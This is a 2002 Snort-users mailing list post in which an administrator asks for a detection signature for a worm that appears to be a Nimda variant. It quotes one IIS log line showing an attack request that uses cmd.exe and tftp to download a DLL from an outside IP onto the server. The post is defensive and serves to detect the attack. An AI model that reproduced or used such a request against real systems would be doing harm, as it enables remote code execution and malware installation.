[Snort-users] Httpodbc.dll

Robert Reid rreid at ...7835...
Tue Dec 24 06:48:02 EST 2002


Morning,

I have been seeing a lot of requests for "httpodbc.dll" in my IIS server
logs. From what I can gather it's a nimda varient that uses the file name
httpodbc.dll for the trojan/listener it drops. Im not concerned with the
attack itself, but my snort boxes are not picking it up. Here is a snippet
from my logs:

2002-12-22 04:32:16 63.147.xxx.xxx - 192.168.xxx.xxx 80 GET
/publish_notfound.asp
404;http://www/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.147.160.27%20GET%2
0cool.dll%20c:\httpodbc.dll 200 0 0 137 47 HTTP/1.0 - - -

Does a snort signature exist for this type of attack?

Thanks a million,

Robert





More information about the Snort-users mailing list